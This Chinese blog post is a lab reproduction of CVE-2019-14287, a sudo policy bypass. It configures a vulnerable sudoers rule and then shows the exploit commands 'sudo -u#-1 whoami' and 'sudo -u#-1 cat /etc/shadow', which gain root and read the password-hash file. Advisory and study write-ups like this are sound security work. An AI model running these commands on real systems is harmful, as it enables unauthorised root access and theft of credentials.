[提权]sudo提权复现(CVE-2019-14287)

2019年10月14日, sudo 官方在发布了 CVE-2019-14287 的漏洞预警。

0x00 简介

sudo 是所有 unix操作系统(BSD, MacOS, GNU/Linux) 基本集成的一个用户权限控制/切换程序。允许管理员控制服务器下用户能够切换的用户权限。

0x01 漏洞概述

该漏洞是一个sudo安全策略绕过问题,可导致恶意用户或程序在目标 Linux 系统上以 root 身份执行任意命令。个人觉得该漏洞比较鸡肋,因为需要特殊的配置才能触发,在默认的Linux中并不会存在该安全问题。

0x02 影响版本

Sudo版本 < 1.8.28

0x03 环境搭建

任何linux机器上执行sudo -V得到的版本 < 1.8.28均可

本人使用的环境为sudo 1.8.16

由于需要特定的配置,所以首先修改配置文件sudoers(文件位置/etc/sudoers)

在 root ALL=(ALL:ALL) ALL 下面添加一行配置:

test    ALL=(ALL,!root) ALL

1.其中的test表示用户名
2.第一个ALL表示允许该用户在任意机器或者终端中使用sudo
3.括号里面的(ALL,!root)表示命令可以被除了root以外的任意用户身份去执行
4.最后一个ALL表示被允许执行

添加的这一行的配置的意思就是:test这个用户可以使用sudo命令,以除了root以外的任意身份去执行命令。

0x04 漏洞利用

1.首先切换到test用户:

su test

2.执行 sudo whoami 失败

3.执行sudo -u#id whoami

这里的id可以去试任何id,我在/etc/group里挑选了test自身的id:1001

执行sudo -u#1001 whoami成功

执行sudo -u#-1 whoami成功

4.尝试高权限操作
执行cat /etc/shadow失败
执行sudo -u#-1 cat /etc/shadow成功

5.解释:
使用 sudo -u#id 指定用户 id 去执行命令,由于可以指定id,所以可以使用-u#-1或者-u#4294967295绕过限制,从而以root身份去执行任意代码:这是因为 sudo 命令本身就已经以用户 ID 为0 运行,因此当 sudo 试图将用户 ID 修改成 -1时,不会发生任何变化。这就导致 sudo 日志条目将该命令报告为以用户 ID 为 4294967295而非 root (或者用户ID为 0)运行命令。

0x05 修复方式

更新至 Sudo 1.8.28 版本

0x06 参考链接

Linux Sudo 被曝漏洞,可导致用户以 root 权限运行命令

CVE-2019-14287:利用sudo提权复现

posted @ 2019-10-16 09:10  肖洋肖恩、  阅读(1620)  评论(0编辑  收藏  举报
jQuery火箭图标返回顶部代码